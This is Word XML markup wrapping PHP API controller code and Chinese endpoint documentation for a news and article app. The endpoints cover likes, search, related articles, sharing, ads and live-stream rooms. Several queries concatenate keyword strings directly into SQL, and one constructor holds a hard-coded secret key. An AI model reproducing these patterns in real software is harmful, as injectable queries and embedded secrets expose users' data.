          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E572D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time    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118242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img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞用户头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38C5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username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞用户名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC4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qianming </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞用户签名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D21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A801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失败信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445160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0E987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FA65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zanList() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36206F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input('post.pages/d', 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1551E5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 = input('param.pingId/d', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E642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Validate(['pages' =&gt; 'number', 'pingId' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A310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['pages' =&gt; $pages, 'pingId' =&gt; $pingId, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCAA4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1C1CB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506F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48963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464F8B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AC89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2CE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$where['pingId'] = $pingId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB69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Db::name('article_ping_zan')-&gt;where($where)-&gt;order('time', 'desc')-&gt;field('uid')-&gt;fetchSql(false)-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCB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1452C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48018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7D445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42563E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$data['data'][$k]['qianming'] = $user['qianming'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A348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130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25B5D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A381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hot_words() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B1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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7626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preg_match("/var BD_DATA=([\s\S]*?)}];/", $html, $data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB14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032AEF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$data['1'] . '}]';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F96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json_decode($data, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B7AE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A2D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40690C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19196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3714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F15ED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4582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search() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA30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input('post.text', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1CE7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Validate(['text' =&gt; 'require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE44A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['text' =&gt; $text, ];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D26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29502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966E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60223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CE102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26AB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A12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Db::name('article')-&gt;limit(5)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE57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4F3424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5FEC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test() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAA2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file_get_contents('http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A450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iconv("gb2312", "utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C184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preg_match_all("/&lt;span class='n2'&gt;(.*?)&lt;\/span&gt;/", $data, $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0381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dump($content[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D3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EF0C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imedia() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B901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input('limit/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274D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(!$limit) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727A0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10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632D0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7E8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0FC8C0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['&lt;&gt;', 0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23845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$where['pingNum'] = ['&lt;&gt;', 0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27806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$where['click'] = ['&lt;&gt;', 0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A55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date('Y-m-d', strtotime("-2 day"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642087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$where['update_time'] = ['&gt;= time', $time];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0CD2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Db::name('article')-&gt;field('id,title,uid,update_time')-&gt;where($where)-&gt;limit($limit)-&gt;order('rand()')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED41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5DE817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($v['uid']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BECCA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36170F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$data[$k]['user']['id'] = $user['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB2DC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$data[$k]['user']['img'] = $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D370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$data[$k]['user']['username'] = $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794B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5F9E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$data[$k]['update_time'] = date('m-d H:i', $v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45485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$data[$k]['create_time'] = date('m-d H:i', $v['update_time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF0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$data[$k]['url'] = url('index/article/view', ['id' =&gt; $v['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37888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EB60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CD4F8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543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channel() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D75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 = input('typeid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E70D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input('limit/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9EDF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(!$limit) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFEA6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10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D3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522E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6CC6E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Db::name('member')-&gt;field('id,img,mobile,nickname')-&gt;where($where)-&gt;limit($limit)-&gt;order('rand()')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE5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6FFB00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($v['nickname']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4011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$data[$k]['username'] = $v['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F137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($v['mobile']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DFF7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$data[$k]['mobile'] = $v['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763122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0B0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$data[$k]['mobile'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA90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$data[$k]['nickname'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104675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(!$v['img']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2740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$data[$k]['img'] = '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED692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BEE9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13AB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60AC29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C721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slide() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C7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Db::name('slide')-&gt;where(['tid' =&gt; 1])-&gt;order('des desc, id desc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD21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27C97E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$slideImg[$k] = _imgUrl() . $v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7816E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$slideText[$k] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EBA6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$slideUrl[$k]['url'] = $v['url'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D2E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$slideUrl[$k]['title'] = $v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7404EF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5598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json(['slide' =&gt; $slideImg, 'typeid' =&gt; $slideUrl, 'title' =&gt; $slideText]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA02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F270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ad() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6D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 ['ad'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C435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($config['hide'] == 0 || !$config['hide']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFBF2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59C97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7C3E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00831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3F1EBA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($config['order'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DD1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Db::name('appad')-&gt;where($where)-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744030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D8D51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11845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['&lt;', $id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01F6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$order = 'id desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60D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AD3C3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$order = 'id desc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690C95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DAAD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Db::name('appad')-&gt;where($where)-&gt;order($order)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A30FA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03FD17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Db::name('appad')-&gt;where(['hide' =&gt; 1])-&gt;order($order)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7206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773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1B3C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['config' =&gt; $config, 'data' =&gt; $data]]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA2E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0DF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DF95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@apiDeprecated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C64E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441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/api/article/clickAjax </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯增加访问次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FAB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资讯增加访问次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1398FF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6F9B64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77E6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6BEE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id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB6B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652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(200) {String} ret </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F3A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EA46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clickAjax() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D39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25A8B6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Validate(['aid' =&gt; 'number|require', ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54738C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['aid' =&gt; $id];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7F8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4B568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2D2FE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038A6F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70D57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DDD7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9D10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01889A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=&gt; $id, 'hide' =&gt; 1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BB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-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211AE9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0749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操作成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3DC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637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14A8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xiangguan(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01833F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input('aid/d');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F44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if(!$aid) exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01898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$aidData = Db::name('article')-&gt;find($aid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E4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if(!$aidData['title']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D2E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512D1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1A8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if(!$aid) exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45823E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$aidData['keywords'] ? $aidData['keywords'] : $aidData['tags'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B34C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B5F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input('limit/d', '6');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1649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if($key){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BEF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explode(',',$key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4D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($key as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5316AE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if($k==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282EC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"`keywords` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D44B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$tags = "`tags` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66B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"`title` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CBA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$description = "`description` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F42B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A45C3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 or `keywords` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715758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$tags .= " or `tags` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD57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 or `title` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181553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$description .= " or `description` LIKE '%".$v."%'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05306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0DDB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98AA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"and (". $keywords ." or ". $tags ." or ". $title ." or ". $description .")";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD206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535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if($aidData['mychannel'] == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC3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 and `video` &lt;&gt; '' ".$keywords;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB0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87E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Db::Query("SELECT id,title,description,mychannel,image,update_time,source,pingNum,images,videodate,uid,click,weitoutiao,zan,video,qiniu_video_type,content FROM `fx_article` WHERE  `mychannel` = '$aidData[mychannel]' and `id`!='$aid' ".$keywords." order by rand() desc limit $limit");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52784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($key as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1502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3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0AF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if(!$v['image']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF10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$v['image'] =  '/' . $v['video'] . '?vframe/jpg/offset/2/w/300/h/200';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196243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C591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$key[$k]['image'] = _imgUrl() . $v['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E6D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$key[$k]['video'] = _imgUrl() . $v['video'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36742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887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07A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json($key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE443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F1BF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zhibo(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123989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Db::name('member_zhibo')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453D1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-&gt;field('roomName,uid,userPwd as password,roomId,type_id,img_l,img_r')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA6F5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-&gt;order('update_time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4617F2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC397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2D9BC0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$ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B394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6F5D81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71420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$data['data'][$k]['user']['username']   =   $user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7066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$data['data'][$k]['user']['img']        =   $user['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1ED6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$data['data'][$k]['user']['fensi']=Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D6C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$v['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C13C6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DADF2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$ids[$k] = $v['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753AC1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158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if(count($data['data'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E8C1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$zhibo = new \app\api\controller\Zhibo("9yQq4VED0hTIIcby4wP9fJeqtvkfZRUm2VbWwrSJlYxDbfUow2qAW+ti/5t1eyA/KIsGaqCoytt/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742C0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json_decode($zhibo-&gt;GetRoomsLiveInfo($ids),true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E87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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55D0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if(!empty($list['ret'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2D8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$list['ret']['entities'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67836D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($list as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF7F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$list_data[$k]['roomId'] = $v['roomId'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC3C3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$list_data[$k]['streamStatus'] = $v['streamStatus'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7421A3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$list_data[$k]['playUserCount'] = $v['playUserCount'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497BF0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B991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FE0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13DDBB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($list_data as $k_s =&gt; $v_s) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5D0F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if($v['roomId'] == $v_s['roomId']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920DE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$data['data'][$k]['streamStatus']   = $v_s['streamStatus'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFD2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$data['data'][$k]['playUserCount']  = $v_s['playUserCount'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E62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52E341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657F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D5B6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BC12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114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7017F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1CF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601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/api/article/related </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相关资讯文章列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55F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相关资讯文章列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234222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3B3C04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883B4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BAF9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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03058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limit       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>记录条数（非必填，默认值：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0530D0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相关资讯文章列表（至多</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>条）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBACF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AD0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related()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B44D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1E68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0A94E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input('param.limit', 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB5F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18A91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AD706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161753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7EAA9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7615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1A3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E96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47A36C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393A5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323C97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$article['keywords'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59932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($keywords == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A6D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$article['tags'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E691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9FD6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($keywords != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE1F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$keywords = explode(',', $keywords);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E155D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$related_articles = Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A928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'&lt;&gt;', $article_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7876C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7EE0A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$where_query = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B722F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$where_conditions = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36884B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($keywords as $keyword) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C84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$where_conditions[] = '(keywords LIKE "%' . $keyword . '%" OR title LIKE "%' . $keyword . '%" OR tags LIKE "%' . $keyword . '%")';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D99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C650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(count($where_conditions) == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716E6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$where_query = $where_conditions[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648433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EC4FA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$where_query = '(' . implode(' OR ', $where_conditions) . ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D81E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1587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$related_articles = $related_articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FF3C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-&gt;where($where_query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C06D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42429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-&gt;limit($limit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA2A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10BDC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(count($related_articles) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B11C9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($related_articles as $key =&gt; $related_article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547CE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$related_articles[$key]['username'] = 'Anonymous';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567EA1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530462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$related_article['uid'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4CBB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CCA00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 &amp;&amp; $member['nickname']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8D57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$related_articles[$key]['username'] = $member['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553F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(!empty($member) &amp;&amp; $member['user']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2266B8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$related_articles[$key]['username'] = $member['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B016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6E54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ACB0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0E5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json($related_articles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67543C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5AA24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B4546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该资讯文章未设置关键字或标签</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA192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216,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008978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D7D9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B022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15F6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4AE50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该资讯文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4451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3E091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4393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7EB1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721B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        {post} /api/article/share </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A244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分享资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327A3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72C1BF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DD438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article_id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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2191E0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用户分享成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745ED5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用户分享失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752C07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35198B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FCF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share()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633DA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4D70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BE231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0F8082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02BE2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E8B83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请先登录账号，然后分享资讯文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09521E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2E5C8B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6CF1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7C5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1A6237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44F5C1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2FBA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2ACC3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6D35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88E1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252CB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C96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53F706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46B90A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3C5F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1C3F81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4B4C35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45AB7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5E3163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-&gt;setInc('share_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFED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3440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用户分享成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E95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568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769E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43754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该资讯文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BE99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3003F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4751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0661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E46C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2D7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65D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/api/article/zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A92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点赞｜取消点赞资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82C1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6C401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0DC0A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@apiParam {String} token       Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486E4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article_id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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E9DA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用户点赞｜取消点赞成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77802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已点赞；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
